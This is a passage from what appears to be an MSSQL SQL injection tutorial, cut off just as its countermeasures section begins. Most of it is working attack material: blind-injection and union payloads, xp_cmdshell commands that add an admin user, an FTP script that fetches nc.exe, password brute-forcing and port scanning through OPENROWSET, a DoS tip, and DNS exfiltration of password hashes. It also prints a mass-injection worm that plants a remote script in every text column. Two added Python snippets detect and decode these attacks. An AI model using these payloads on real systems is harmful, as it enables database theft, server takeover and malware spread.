http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--
[End SQLi]--------------------------------------------------------------------------
Now, we can enumerate the rest of the data.
###########################################
[0x03] - MSSQL Blind SQL Injection Attack
###########################################
In some cases, normal SQL injection does not work. Blind SQL injection is another method which may help you.
The important point for blind SQL injection is the difference between the valid and invalid query results.
You have to inject a statement that makes the query valid or invalid and observe the response.
Just because you don't see any results doesn't mean that your injected SQL is not being executed!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - How to Test sites that are vulnerable in Blind SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
We assume that http://www.example.com/page.asp?id=1 is the normal URL to open the web page.
You can try to inject a statement like this:
http://www.example.com/page.asp?id=1 and 1=1
and
http://www.example.com/page.asp?id=1 and 1=2
If the results from these requests are different, it is a good signal for you:
this website may be vulnerable to blind SQL injection. When you put "id=1 and 1=1",
the condition is true, so the response must be normal.
But the parameter "id=1 and 1=2" makes the condition false,
and if the webmaster does not provide a proper filter, the response clearly differs from the previous one.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Determine data through Blind SQL Injection
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Using the blind technique, you have to spend more time than with normal injection.
You obtain only one character while sending several queries to the server.
We will give you an example of querying the first character of the database name.
We assume that the database name is member. Therefore, the first character is "m",
whose ASCII value is 109. (At this point, we assume that you know ASCII codes.)
OK, first, we have to know that the results from requests have only 2 forms:
1. Valid query result, like http://www.example.com/page.asp?id=1 and 1=1
2. Invalid query result, like http://www.example.com/page.asp?id=1 and 1=2
The following steps are up to each person. Your idea of which ASCII code to test next may differ from ours.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
In this situation, the result will be a valid query result, like http://www.example.com/page.asp?id=1 and 1=1
(because the first character of the database name is "m", whose ASCII code is 109). Then, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120
Surely the result will be like http://www.example.com/page.asp?id=1 and 1=2 (because 109 is less than 120).
Next, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105
The result is a valid query result, so at this point the ASCII value of the first character of the database name is between 105 and 120.
So, we try
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result
You see that the first character of the database name has an ASCII value which is greater than 108
but not greater than 109. Thus, we can conclude that the ASCII value is equal to 109.
You can prove it with:
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109
We are sure that the result is like the result of http://www.example.com/page.asp?id=1 and 1=1 .
The rest you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.
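As an added example that is not part of the original tutorial, here is a Python detector for the two request sequences described in sections 0x02c and 0x03b: the ORDER BY column-count probes followed by a UNION SELECT, and the run of ISNULL(ASCII(SUBSTRING(...))) comparisons that make up a blind character search. The log format, client addresses and alert thresholds are assumptions made for the example.

```python
# Added example, not from the original tutorial: flag the enumeration patterns
# from sections 0x02c (ORDER BY / UNION SELECT) and 0x03b (blind character
# search) in web-server access logs. Log lines and addresses are constructed.
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: '<client> "<method> <path> HTTP/x.y"' per line.
SAMPLE_LOG = """\
10.0.0.5 "GET /page.asp?id=1 HTTP/1.1"
10.0.0.5 "GET /page.asp?id=1%20order%20by%204-- HTTP/1.1"
10.0.0.5 "GET /page.asp?id=1%20order%20by%205-- HTTP/1.1"
10.0.0.5 "GET /page.asp?id=1%20and%201=2%20UNION%20SELECT%2011,22,33,@@version-- HTTP/1.1"
10.0.0.9 "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>90 HTTP/1.1"
10.0.0.9 "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>120 HTTP/1.1"
10.0.0.9 "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>105 HTTP/1.1"
10.0.0.9 "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>112 HTTP/1.1"
10.0.0.9 "GET /page.asp?id=1%20AND%20ISNULL(ASCII(SUBSTRING(CAST((SELECT%20LOWER(db_name(0)))AS%20varchar(8000)),1,1)),0)>109 HTTP/1.1"
10.0.0.7 "GET /showthread.asp?id=42 HTTP/1.1"
"""

LINE_RE = re.compile(r'^(?P<client>\S+) "(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)\s*--", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# ASCII(SUBSTRING(...)) wrapped in ISNULL(..., 0) and compared with a number:
# the shape of every request in the tutorial's binary search.
BLIND_RE = re.compile(
    r"ascii\s*\(\s*substring\s*\(.*\)\s*,\s*0\s*\)\s*([<>=]+)\s*(\d+)", re.I | re.S)


def classify(path):
    """Classify one request path after URL-decoding its query string."""
    query = unquote_plus(path.partition("?")[2])
    m = BLIND_RE.search(query)
    if m:
        return "blind_probe", m.group(1) + m.group(2)   # e.g. ">109"
    if UNION_RE.search(query):
        return "union_select", query
    m = ORDER_BY_RE.search(query)
    if m:
        return "order_by_probe", int(m.group(1))
    return "benign", None


def analyze(log_text):
    """Return {client: [finding, ...]}; an empty list means nothing suspicious."""
    seen = defaultdict(lambda: {"order_by_probe": [], "blind_probe": [], "union_select": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        bucket = seen[m.group("client")]
        kind, detail = classify(m.group("path"))
        if kind == "union_select":
            bucket[kind] += 1
        elif kind != "benign":
            bucket[kind].append(detail)
    findings = {}
    for client, s in seen.items():
        notes = []
        if s["union_select"]:
            notes.append("union-based extraction (%d request(s))" % s["union_select"])
        if len(s["order_by_probe"]) >= 2:   # one ORDER BY may be legitimate; a run is not
            notes.append("column-count enumeration: ORDER BY %s"
                         % ", ".join(str(n) for n in s["order_by_probe"]))
        if len(s["blind_probe"]) >= 3:      # three comparisons already look like a search
            notes.append("blind character search: %s" % " ".join(s["blind_probe"]))
        findings[client] = notes
    return findings


if __name__ == "__main__":
    for client, notes in analyze(SAMPLE_LOG).items():
        print(client, "->", "; ".join(notes) or "nothing suspicious")
```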
++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Exploit query for get Table name
++++++++++++++++++++++++++++++++++++++++++++
In order to get a table name, we can use the above method to obtain each character of the table name.
The only thing that we have to do is to change the query to retrieve a table name of the current database.
As MSSQL does not have a LIMIT command, the query is a bit complicated.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97
The above query is used to determine the first character of the first table in the current database. If we want to find the second character of the first table,
we can do it with the following request:
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
We change the second parameter of the substring function from 1 to 2 in order to specify the preferred position of the character in the table name.
Thus, if we want to determine other positions, we only need to change the second parameter of the substring function.
For other tables, we can find other table names by changing the second select
from "SELECT TOP 1" to "SELECT TOP 2", "SELECT TOP 3" and so on. For example,
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)=97
The above request determines the first character of the second table name in the current database.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03d] - Exploit query for get Column name
+++++++++++++++++++++++++++++++++++++++++++++
After we obtain table names, the next target is, of course, the column names.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97
In order to circumvent magic-quote filtering, you have to change 'tablename'
into a concatenation of char() calls. For example, if the table name is 'user',
when we put 'user' in the query, ' may be filtered and our query will be wrong.
The solution is to convert 'user' to char(117)+char(115)+char(101)+char(114).
So, the query in the WHERE clause changes from "Where name='user'" to "Where name=char(117)+char(115)+char(101)+char(114)".
In this case, we can circumvent magic-quote filtering. The result of the above request is the first character of the first column name of the specified table.
When we want to find the second character of the first column, we can use the same method as for getting the table name, by changing the second parameter of the
substring function.
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97
The above request is used to determine the second character of the first column name in the specified table.
To determine other columns, we change the p.x value from 1 to 2, 3, 4 and so on, such as:
http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97
The first character of the second column name in the specified table can be determined by the above request.
##############################################
[0x04] - More Dangerous SQL Injection Attack
##############################################
In Chapters [0x02] and [0x03], we described retrieving useful data extracted from the database
via SQL injection techniques - for example, by performing a UNION attack, returning data in an error message, and blind injection.
This chapter will show not only data extraction but command execution and SQL worms as well.
+++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04a] - Dangers of Extended Stored Procedures
+++++++++++++++++++++++++++++++++++++++++++++++++++++
xp_cmdshell - Executes a given command on the operating system hosting MSSQL
- Available by default on all MSSQL versions (disabled by default on MSSQL 2005)
- Can only be executed by 'sa' and any other users with 'sysadmin' privileges
xp_regxxx - Read/write registry keys, potentially including reading the SAM
xp_regread
xp_regwrite
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
[Example: determine what null-session shares are available on the server]
exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
xp_servicecontrol - Allows services to be managed
[Example Command]--------------------------------------------------------------------
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
[End Command]------------------------------------------------------------------------
xp_availablemedia - Reveals the available drives on the machine
xp_dirtree - Allows a directory tree to be obtained
xp_enumdsn - Enumerates ODBC data sources on the server
xp_makecab - Allows the user to create a compressed archive of files on the server
xp_ntsec_enumdomains - Enumerates domains that the server can access
xp_terminate_process - Terminate a process (PID)
xp_loginconfig - Login mode
+++++++++++++++++++++++++++++++++++++++++++++
[0x04b] - Advanced SQL Injection Techniques
+++++++++++++++++++++++++++++++++++++++++++++
"xp_cmdshell" Stored procedures, executes any command shell in the server with the same permissions that it is currently running.
By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
EXEC master.dbo.xp_cmdshell 'net user cwh cwh1234 /add' ;-- //Use for add user "cwh" into system.
EXEC master.dbo.xp_cmdshell 'net localgroup administrators cwh /add' ;-- //Use for escalating privilege "cwh" to admin group
Example through SQL injection in a numeric field via a GET request:
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
On MSSQL 2000:
If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc,
you can simply inject the following code:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
** Tip **
[Question]
We determined that the web application connects to the DB with an unprivileged account,
so we can't execute xp_cmdshell or access any interesting data?
[Answer]
It's not the end. First we must enumerate the MSSQL user accounts that have system administrator privileges.
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union all select null,null,name,null,null,null,null from master..syslogins where name not in ('sa') and sysadmin=1;--
[End Code]----------------------------------------------------------------------------------
[Result]------------------------------------------------------------------------------------
sa
cwh
example
[End Result]--------------------------------------------------------------------------------
We can use "OPENROWSET" to re-connect to the same database server under each enumerated
sysadmin account and guess passwords. This was automated with a Perl script that brute-forced password guesses through the SQL injection:
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','server=VICTIMDBNAME;uid=$USER;pwd=$PASS','select * from master..sysusers')--
[End Code]----------------------------------------------------------------------------------
//Result: Found that "CWH" has the password "1234"
Leverage the "OPENDATASOURCE" function to execute a stored procedure on the database under the "CWH" system administrator credentials:
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1; EXEC opendatasource('SQLoledb','Persist Security Info=False;DataSource=VICTIMDBNAME;UserID=CWH;Password=1234').master
.dbo.xp_cmdshell 'net user hacklol 1234 /add';
[End Code]----------------------------------------------------------------------------------
//Dirty attack: use TFTP and Netcat to run a reverse shell. Gained access from the Internet into the internal network.
= How about Upload of executables ? =
Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables to the target DB server.
A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine,
all that is needed is to inject the following queries:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
= How about Retrieving VNC Password from Registry ? =
'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default',
@value_name='password',
@value = @out output
select cast (@out as bigint) as x into TEMP--
' and 1 in (select cast(x as varchar) from temp)--
= How about Port Scanning ? =
We can use the SQL injection vulnerability as a rudimentary IP/port scanner of the internal network or the Internet.
[Code]--------------------------------------------------------------------------------------
http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5',
'select * from table')--
[End Code]----------------------------------------------------------------------------------
This code makes an outbound connection to 10.10.10.12 on port 80. If the port is closed, the timeout (5 seconds)
given in the parameter will be consumed and the error message displayed will be:
"SQL Server does not exist or access denied"
If the port is open, the timeout will not be consumed and the error message returned will be:
"General network error. Check your network documentation"
or
"OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."
With this technique, we are able to map open ports on the IP addresses of hosts on the internal network (w00t!!)
** Note **
This technique can also be used for Denial of Service (DoS): just change the port to one such as FTP (21) and raise the timeout to a high value (500).
It makes many connections to the target over the FTP service (port 21).
++++++++++++++++++++++++++++++++++++++
[0x04c] - Mass MSSQL Injection Worms
++++++++++++++++++++++++++++++++++++++
Recently, we came across a particularly interesting type of SQL injection that, at times, can be quite difficult to clean up,
even with the most robust database backup and recovery scheme. This attack is conducted with the help of an Internet robot, also
known as a malbot, which attacks its prospects daily. It is likely that such a malbot fires the series of injection attempts continuously
and conditionally until the malicious script references are sensed on the targeted web pages. There is nothing new in the way that
the following T-SQL is injected. Yet, the generic nature of the script is somewhat interesting to see.
[SQLi worm]---------------------------------------------------------------------------------
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035
0029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F004300
7500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E
0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000
6200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020
0061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0072002000
62002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
[End SQLi]----------------------------------------------------------------------------------
When we decode the hex-encoded part of this SQLi code:
[SQLi Decoded]------------------------------------------------------------------------------
DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://www.fengnima.cn/k.js">
</script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
[End SQLi]----------------------------------------------------------------------------------
What happens as a result? It finds all text fields in the database and appends a link to malicious JavaScript,
<script src="http://www.fengnima.cn/k.js">
</script>, to each and every one of them, which makes your website serve it automatically.
So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring parameter (a dynamic value such as
an article ID, product ID, etc.) and tried to use it to deliver their SQL injection code.
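Added example, not from the original tutorial: a Python decoder for the CAST(0x... AS NVARCHAR(4000)) wrapper the worm uses, followed by a triage of what the decoded T-SQL does. SQL Server stores NVARCHAR as UTF-16LE, which is why every character in the blob takes four hex digits; the sample payload and the placeholder script host malicious.example are constructed here and are not the worm's real values.

```python
# Added example, not from the original tutorial: decode the CAST(0x... AS
# NVARCHAR) wrapper used by the mass-injection worm in section 0x04c and report
# what the decoded T-SQL does. The sample payload below is constructed here from
# a plaintext body (placeholder host, not the worm's real script URL).
import re
from urllib.parse import unquote

# Plaintext of the constructed sample, shaped like the decoded worm script.
DECODED_SAMPLE = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+"
    "''<script src=http://malicious.example/k.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
# NVARCHAR is UTF-16LE on SQL Server, so 'D' becomes 4400, 'E' becomes 4500, ...
SAMPLE_PARAM = (
    "';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + DECODED_SAMPLE.encode("utf-16-le").hex().upper()
    + "AS%20NVARCHAR(4000));EXEC(@S);--"
)

HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s*AS\s+(N?)VARCHAR\(\d+\)\)", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\"'\s>]+)", re.I)
INDICATORS = [
    ("cursor over sysobjects/syscolumns",
     re.compile(r"cursor\s+for\s+select.+?sysobjects.+?syscolumns", re.I | re.S)),
    ("mass UPDATE of text columns",
     re.compile(r"update\s*\[\s*'\s*\+\s*@\w+\s*\+\s*'\s*\]\s*set", re.I)),
    ("script tag appended to column data", SCRIPT_SRC_RE),
]


def decode_hex_casts(raw_param):
    """Return the decoded text of every CAST(0x.. AS [N]VARCHAR(n)) in a request parameter."""
    decoded = []
    for m in HEX_CAST_RE.finditer(unquote(raw_param)):
        hex_digits, nvarchar = m.group(1), m.group(2)
        if len(hex_digits) % 2:
            continue                       # not a valid byte string; skip rather than crash
        blob = bytes.fromhex(hex_digits)
        # NVARCHAR is UTF-16LE; a plain VARCHAR cast is single-byte text.
        decoded.append(blob.decode("utf-16-le") if nvarchar else blob.decode("latin-1"))
    return decoded


def triage_request(raw_param):
    """Decode any hex-wrapped statements and list what they contain."""
    decoded = decode_hex_casts(raw_param)
    indicators, urls = [], []
    for text in decoded:
        for label, pattern in INDICATORS:
            if pattern.search(text) and label not in indicators:
                indicators.append(label)
        urls.extend(SCRIPT_SRC_RE.findall(text))
    return {"decoded": decoded, "indicators": indicators, "script_urls": urls}


if __name__ == "__main__":
    report = triage_request(SAMPLE_PARAM)
    print("indicators:", report["indicators"])
    print("script URLs:", report["script_urls"])
```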
########################################
[0x05] - MSSQL Injection Cheat Sheet
########################################
** Some of the queries in the table below can only be run by an admin (SA Privilege).
These are marked with "-- priv" at the end of the query. **
+---------------+---------------------------------------------------------------------------+
| Version | SELECT @@version |
|---------------|---------------------------------------------------------------------------|
| Comments | SELECT 1 -- comment |
| | SELECT /*comment*/1 |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name(); |
| | SELECT system_user; |
| Current User | SELECT user; |
| | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
|---------------|---------------------------------------------------------------------------|
| List Users | SELECT name FROM master..syslogins |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv |
| | |
| | SELECT name, master.dbo.fn_varbintohexstr(password) |
| | FROM master..sysxlogins -- priv |
| List Password | |
| Hashes | MSSQL2005: SELECT name, password_hash FROM |
| | master.sys.sql_logins -- priv |
| | |
| | SELECT name + '-' + |
| | master.sys.fn_varbintohexstr(password_hash) |
| | FROM master.sys.sql_logins -- priv |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? |
| | returns 1 for true, 0 for false, NULL for invalid role. |
| | Also try 'bulkadmin', 'systemadmin' and other values. |
| List DBA | |
| Accounts | |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? |
| | return 1 for true, 0 for false, NULL for invalid role/username. |
|---------------|---------------------------------------------------------------------------|
| Current DB | SELECT DB_NAME() |
|---------------|---------------------------------------------------------------------------|
| List | SELECT name FROM master..sysdatabases; |
| Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE |
| | name = 'mytable'); -- for the current DB only |
| | |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM |
| | master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list colum names |
| | and types for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U'; |
| | (Use xtype = 'V' for views) |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; |
| | |
| List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) |
| | FROM master..syscolumns, master..sysobjects WHERE |
| | master..syscolumns.id=master..sysobjects.id AND |
| | master..sysobjects.name='sometable'; -- list column names and types |
| | for master..sometable |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database. |
| | If you wan't to search another db, you need to specify the db name |
| Find Tables | (e.g. replace sysobject with mydb..sysobjects). |
| From | |
| Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- |
| | this lists table, column for each column containing the word 'password' |
|---------------|---------------------------------------------------------------------------|
| Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins |
| Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c |
|---------------|---------------------------------------------------------------------------|
| Bitwise AND | SELECT 6 & 2 -- returns 2 |
| | SELECT 6 & 1 -- returns 0 |
|---------------|---------------------------------------------------------------------------|
| ASCII Value | SELECT char(0x41) -- returns A |
| -> Char | |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') - returns 65 |
| Value | |
|---------------|---------------------------------------------------------------------------|
| Casting | SELECT CAST('1' as int); |
| | SELECT CAST(1 as char) |
|---------------|---------------------------------------------------------------------------|
| String | SELECT 'A' + 'B' - returns AB |
| Concatenation | |
|---------------|---------------------------------------------------------------------------|
| If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB |
|---------------|---------------------------------------------------------------------------|
| Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins; |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); |
| | -- nonpriv, works on 2000 |
| | |
| | declare @host varchar(800); select @host = name + '-' + |
| Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005 |
| | |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we |
| | have to use @host. Messy but necessary. |
| | -- Also check out theDNS tunnel feature of sqlninja |
|---------------|---------------------------------------------------------------------------|
| Command | EXEC xp_cmdshell 'net user'; -- priv |
| Execution | |
|---------------|---------------------------------------------------------------------------|
| Local | CREATE TABLE mydata (line varchar(8000)); |
| File Access | BULK INSERT mydata FROM 'c:\boot.ini'; |
| | DROP TABLE mydata; |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP | SELECT HOST_NAME() |
|---------------|---------------------------------------------------------------------------|
| Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Drop Users | EXEC sp_droplogin 'user'; -- priv |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv |
+---------------+---------------------------------------------------------------------------+
########################################
[0x06] - SQL Injection Countermeasures
########################################
The main cause of SQL injection vulnerabilities is missing input validation. Many web developers do not provide
a proper mechanism to sanitize input, so attackers take advantage of this and gain access
to many databases. There are several ways to prevent SQL injection vulnerabilities:
